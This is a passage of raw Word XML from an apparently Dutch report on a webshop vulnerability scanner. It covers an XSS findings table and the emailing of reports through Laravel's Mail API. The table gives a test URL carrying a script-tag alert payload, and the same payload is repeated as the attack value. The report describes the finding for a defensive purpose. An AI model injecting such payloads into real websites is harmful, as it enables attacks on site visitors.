                                <w:p w14:paraId="300E984F" w14:textId="2B1AB463" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:pPr>
                                    <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                  </w:pPr>
                                  <w:r>
                                    <w:t>8</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                            <w:tr w:rsidR="00CE4BB5" w14:paraId="64239164"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04DB9F59" w14:textId="5107218A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:r>
                                    <w:t>Referentie</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                              <w:tc>
                                <w:tcPr>
                                  <w:tcW w:w="4201" w:type="dxa"/>
                                </w:tcPr>
                                <w:p w14:paraId="787CBB1F" w14:textId="0C37C836" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                                  <w:pPr>
                                    <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                                  </w:pPr>
                                  <w:proofErr w:type="gramStart"/>
                                  <w:r w:rsidRPr="008E0498">
                                    <w:t>https://www.owasp.org/index.php/Cross-site_Scripting_(XSS</w:t>
                                  </w:r>
                                  <w:proofErr w:type="gramEnd"/>
                                  <w:r w:rsidRPr="008E0498">
                                    <w:t>)</w:t>
                                  </w:r>
                                </w:p>
                              </w:tc>
                            </w:tr>
                          </w:tbl>
                          <w:p w14:paraId="6F72844A" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4B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A2B2A9" id="Text Box 40" o:spid="_x0000_s1106" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-5.85pt;margin-top:399.9pt;width:435pt;height:153.2pt;z-index:252027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tS4lXkCAABkBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtI27UwKlLUgZgmIUCD&#10;iWfXsWk02+fZ1ybdX8/ZSUrH9sK0l+R897vvj7Pz1hq2VSHW4Eo+PhpxppyEqnZPJf/+cPXhE2cR&#10;hauEAadKvlORny/evztr/FxNYA2mUoGRERfnjS/5GtHPiyLKtbIiHoFXjoQaghVIz/BUVEE0ZN2a&#10;YjIaHRcNhMoHkCpG4l52Qr7I9rVWEm+1jgqZKTnFhvkb8neVvsXiTMyfgvDrWvZhiH+IworakdO9&#10;qUuBgm1C/YcpW8sAETQeSbAFaF1LlXOgbMajV9ncr4VXORcqTvT7MsX/Z1bebO8Cq6uST6k8Tljq&#10;0YNqkX2GlhGL6tP4OCfYvScgtsSnPg/8SMyUdquDTX9KiJGcTO321U3WJDFns8l0NiKRJNn4dDo7&#10;7uwXL+o+RPyiwLJElDxQ+3JVxfY6IoVC0AGSvDm4qo3JLTTuNwYBO47KM9Brp0y6iDOFO6OSlnHf&#10;lKYa5MATI0+fujCBbQXNjZBSOcw5Z7uETihNvt+i2OOTahfVW5T3GtkzONwr29pByFV6FXb1YwhZ&#10;d3iq30HeicR21ebmn3wcOrqCakeNDtCtSvTyqqZmXIuIdyLQblADad/xlj7aQFNy6CnO1hB+/Y2f&#10;8DSyJOWsoV0refy5EUFxZr46GubT8TRNH+bHdHYyoUc4lKwOJW5jL4DaMqbL4mUmEx7NQOoA9pHO&#10;wjJ5JZFwknyXHAfyArsLQGdFquUyg2gdvcBrd+9lMp3KnEbtoX0UwffziDTKNzBspZi/GssOmzQd&#10;LDcIus4zmwrdVbVvAK1yHuX+7KRbcfjOqJfjuHgGAAD//wMAUEsDBBQABgAIAAAAIQAFOUwt4AAA&#10;AAwBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUjcWjuFtkmIUyEQV1ALVOrNjbdJ&#10;RLyOYrcJf89yguNqn2beFJvJdeKCQ2g9aUjmCgRS5W1LtYaP95dZCiJEQ9Z0nlDDNwbYlNdXhcmt&#10;H2mLl12sBYdQyI2GJsY+lzJUDToT5r5H4t/JD85EPoda2sGMHO46uVBqJZ1piRsa0+NTg9XX7uw0&#10;fL6eDvt79VY/u2U/+klJcpnU+vZmenwAEXGKfzD86rM6lOx09GeyQXQaZkmyZlTDOst4AxPpMr0D&#10;cWQ0UasFyLKQ/0eUPwAAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAAL&#10;AAAAAAAAAAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDe1LiVeQIAAGQFAAAO&#10;AAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAFOUwt4AAAAAwB&#10;AAAPAAAAAAAAAAAAAAAAANEEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA3gUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:tbl>
                      <w:tblPr>
                        <w:tblStyle w:val="GridTable2-Accent3"/>
                        <w:tblW w:w="0" w:type="auto"/>
                        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
                      </w:tblPr>
                      <w:tblGrid>
                        <w:gridCol w:w="4201"/>
                        <w:gridCol w:w="4201"/>
                      </w:tblGrid>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="776EB50A" w14:textId="77777777" w:rsidTr="00063C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2" w:type="dxa"/>
                            <w:gridSpan w:val="2"/>
                          </w:tcPr>
                          <w:p w14:paraId="6E48BC5A" w14:textId="6D4E7C57" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t>Kwetsbaarheden details</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="7418281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2B9ED22A" w14:textId="5DC7013A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t>Kwetsbaarheid</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="4201" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="06F15A0C" w14:textId="3686E61D" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t>XSS</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="086D8617"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6D2433A5" w14:textId="4EE40AEB" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t>Omschrijving</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="4201" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="20DE3A41" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="329C4B3C"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CBDD5DA" w14:textId="3B61DF4A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t>URL</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="4201" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="49C2008F" w14:textId="7C34BA70" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                            </w:pPr>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>www.webshop.nl?id</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t>=&lt;script&gt;alert(34c829ctn7) &lt;/script&gt;</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="2684DBE0"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30FF1C1B" w14:textId="124E2D6F" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t>Aanval</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="4201" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="45E61372" w14:textId="58A0C7B8" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t>&lt;</w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>script</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t>&gt;alert(34c829ctn7) &lt;/script&gt;</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="7916B213"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51F3E396" w14:textId="5C31A954" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t>Impact</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="4201" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="146EC8B6" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="07BFCFFF"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76BA7970" w14:textId="7839E995" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t>Oplossing</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="4201" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="6AD1A550" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                            </w:pPr>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="3AF5DAE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49B2CB2" w14:textId="60C2F2D0" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t>WASC ID</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="4201" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="300E984F" w14:textId="2B1AB463" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                            </w:pPr>
                            <w:r>
                              <w:t>8</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                      <w:tr w:rsidR="00CE4BB5" w14:paraId="64239164"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04DB9F59" w14:textId="5107218A" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t>Referentie</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                        <w:tc>
                          <w:tcPr>
                            <w:tcW w:w="4201" w:type="dxa"/>
                          </w:tcPr>
                          <w:p w14:paraId="787CBB1F" w14:textId="0C37C836" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                            </w:pPr>
                            <w:proofErr w:type="gramStart"/>
                            <w:r w:rsidRPr="008E0498">
                              <w:t>https://www.owasp.org/index.php/Cross-site_Scripting_(XSS</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="008E0498">
                              <w:t>)</w:t>
                            </w:r>
                          </w:p>
                        </w:tc>
                      </w:tr>
                    </w:tbl>
                    <w:p w14:paraId="6F72844A" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00706E60">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Tweede Pagina</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A102F09" w14:textId="39A1132F" w:rsidR="00250FC7" w:rsidRPr="00B3103C" w:rsidRDefault="00250FC7"/>
    <w:p w14:paraId="2E078DAD" w14:textId="17D995D8" w:rsidR="003C1492" w:rsidRDefault="003E3EF9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252033024" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0AFAA032" wp14:editId="22CB5410">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-12065</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>358140</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5652135" cy="342900"/>
                <wp:effectExtent l="0" t="0" r="37465" b="38100"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="523" name="Text Box 523"/>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CF95F5F" w14:textId="481A54C1" w:rsidR="00CE4BB5" w:rsidRPr="00A5117E" w:rsidRDefault="00CE4BB5" w:rsidP="003E3EF9">
                            <w:r w:rsidRPr="00A5117E">
                              <w:t>B</w:t>
                            </w:r>
                            <w:r>
                              <w:t>usiness Doel: Het verzenden van het rapport via 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FAA032" id="Text Box 523" o:spid="_x0000_s1107" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.95pt;margin-top:28.2pt;width:445.05pt;height:27pt;z-index:252033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6kOgIsCAACNBQAADgAAAGRycy9lMm9Eb2MueG1srFRLbxoxEL5X6n+wfC8LBJIGZYkoEVUllERN&#10;qpyN1w5WbY9rG3bpr+/Yu0tQmkuqXnbHM9+8H1fXjdFkL3xQYEs6GgwpEZZDpexzSX88rj59piRE&#10;ZiumwYqSHkSg1/OPH65qNxNj2IKuhCdoxIZZ7Uq6jdHNiiLwrTAsDMAJi0IJ3rCIT/9cVJ7VaN3o&#10;Yjwcnhc1+Mp54CIE5N60QjrP9qUUPN5JGUQkuqQYW8xfn7+b9C3mV2z27JnbKt6Fwf4hCsOURadH&#10;UzcsMrLz6i9TRnEPAWQccDAFSKm4yDlgNqPhq2wetsyJnAsWJ7hjmcL/M8tv9/eeqKqk0/EZJZYZ&#10;bNKjaCL5Ag1JPKxQ7cIMgQ8OobFBAXa65wdkpsQb6U36Y0oE5Vjrw7G+yRxH5vR8Oh6dTSnhKDub&#10;jC+HuQHFi7bzIX4VYEgiSuqxf7msbL8OESNBaA9JziyslNa5h9omRgCtqsTLjzREYqk92TNsf2xy&#10;0GjiBIWvVlPkYem8pITbxDIVD1okg9p+FxKLlfN7wwPjXNjYe8nohJIYz3sUO3xSbaN6j/JRI3sG&#10;G4/KRlnwuZp5u14KU/3sQ5YtHut8knciY7Np8pRcTPrGb6A64Dx4aHcqOL5S2LQ1C/GeeVwiHAE8&#10;DPEOP1JDXVLoKEq24H+/xU94nG2UUlLjUpY0/NoxLyjR3yxO/eVoMklbnB+T6cUYH/5UsjmV2J1Z&#10;AjZ+hCfI8UwmfNQ9KT2YJ7wfi+QVRcxy9I2T0pPL2J4KvD9cLBYZhHvrWFzbB8eT6VTmNJKPzRPz&#10;rpvbiBN/C/36stmr8W2xSdPCYhdBqjzbqdBtVbsG4M7nke/uUzoqp++Mermi8z8AAAD//wMAUEsD&#10;BBQABgAIAAAAIQAh1/jH4gAAAAkBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9NT8JAEIbvJv6HzZh4&#10;g20J1lq7JXyExBA8AIZ4XLpj29idbboLlH/veNLj5H3yvs/ks8G24oK9bxwpiMcRCKTSmYYqBR+H&#10;9SgF4YMmo1tHqOCGHmbF/V2uM+OutMPLPlSCS8hnWkEdQpdJ6csarfZj1yFx9uV6qwOffSVNr69c&#10;bls5iaJEWt0QL9S6w2WN5ff+bBW8HW6b3fPyPbGbxepze5T+uF5tlXp8GOavIAIO4Q+GX31Wh4Kd&#10;Tu5MxotWwSh+YVLBUzIFwXmaphMQJwbjaAqyyOX/D4ofAAAA//8DAFBLAQItABQABgAIAAAAIQDk&#10;mcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAG&#10;AAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAG&#10;AAgAAAAhAE+pDoCLAgAAjQUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;FAAGAAgAAAAhACHX+MfiAAAACQEAAA8AAAAAAAAAAAAAAAAA4wQAAGRycy9kb3ducmV2LnhtbFBL&#10;BQYAAAAABAAEAPMAAADyBQAAAAA=&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6CF95F5F" w14:textId="481A54C1" w:rsidR="00CE4BB5" w:rsidRPr="00A5117E" w:rsidRDefault="00CE4BB5" w:rsidP="003E3EF9">
                      <w:r w:rsidRPr="00A5117E">
                        <w:t>B</w:t>
                      </w:r>
                      <w:r>
                        <w:t>usiness Doel: Het verzenden van het rapport via email</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AC1BFE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Het verzenden van rapporten</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115638A4" w14:textId="77777777" w:rsidR="00AC1BFE" w:rsidRDefault="00AC1BFE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BE28057" w14:textId="7B938EF7" w:rsidR="000738BF" w:rsidRDefault="00F2124B">
      <w:r>
        <w:t xml:space="preserve">Het verzenden van rapporten en het beheren ervan behoren tot de laatste processen van </w:t>
      </w:r>
      <w:r w:rsidR="00D8631B">
        <w:t>de Web Applicatie Scanner. Het verzendproces is de laatste stap van de service die het softwaresysteem biedt en is het einddoel bereikt</w:t>
      </w:r>
      <w:r w:rsidR="00D66C73">
        <w:t xml:space="preserve">. Het business doel van dit deel is: </w:t>
      </w:r>
      <w:r w:rsidR="00D66C73" w:rsidRPr="00D66C73">
        <w:t>We moeten naast het ontwikkelen van webshop ook meer de focus leggen op security door de klant meer inzicht te bieden op de</w:t>
      </w:r>
      <w:r w:rsidR="00D66C73">
        <w:t xml:space="preserve"> security staat van hun webshop (H2, business doel). </w:t>
      </w:r>
      <w:r w:rsidR="001E3F8F">
        <w:t>Om dit business doel te bereiken is met het produceren van het rapport het doel nog niet</w:t>
      </w:r>
      <w:r w:rsidR="00DD6A06">
        <w:t xml:space="preserve"> bereikt, dus de laatste stap is dus het verzenden van het rapport naar de klant toe.</w:t>
      </w:r>
      <w:r w:rsidR="00601E13">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D4628F">
        <w:t>Voor het beheren van de rapporten refereer ik je naar hoofdstuk 4.4.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D271BCB" w14:textId="2709A8B9" w:rsidR="000B6327" w:rsidRDefault="00EB44F2">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252028928" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="59F768E4" wp14:editId="18DCEADA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1905</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>659130</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3543935" cy="2421890"/>
            <wp:effectExtent l="0" t="0" r="1206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mail methodes.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3543935" cy="2421890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00601E13">
        <w:t xml:space="preserve">Het is een simpel proces waarbij gebruik wordt gemaakt van een geïntegreerde </w:t>
      </w:r>
      <w:r w:rsidR="00AA5713">
        <w:t xml:space="preserve">e-mailservice van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AA5713">
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0099762D">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0099762D">
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0099762D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000738BF">
        <w:t xml:space="preserve">heeft een eigen API genaamd “Mail” </w:t>
      </w:r>
      <w:r w:rsidR="0099762D">
        <w:t xml:space="preserve">gebouwd met de Library van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0099762D">
        <w:t>SwiftMailer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000738BF">
        <w:t xml:space="preserve"> als basis. </w:t>
      </w:r>
      <w:r w:rsidR="009C0906">
        <w:t xml:space="preserve">Het is een simpele API dat de basis functionaliteiten bevat van een mailing service. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6935C271" w14:textId="389A773B" w:rsidR="00F31CD1" w:rsidRDefault="00C60E78">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252030976" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3B2271FE" wp14:editId="3E50EBAD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1905</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2473325</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3543935" cy="180340"/>
                <wp:effectExtent l="0" t="0" r="12065" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="18254"/>
                    <wp:lineTo x="21519" y="18254"/>
                    <wp:lineTo x="21519" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="514" name="Text Box 514"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3543935" cy="180340"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="49E998DE" w14:textId="563C05BA" w:rsidR="00CE4BB5" w:rsidRPr="000A6E8D" w:rsidRDefault="00CE4BB5" w:rsidP="008A237F">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
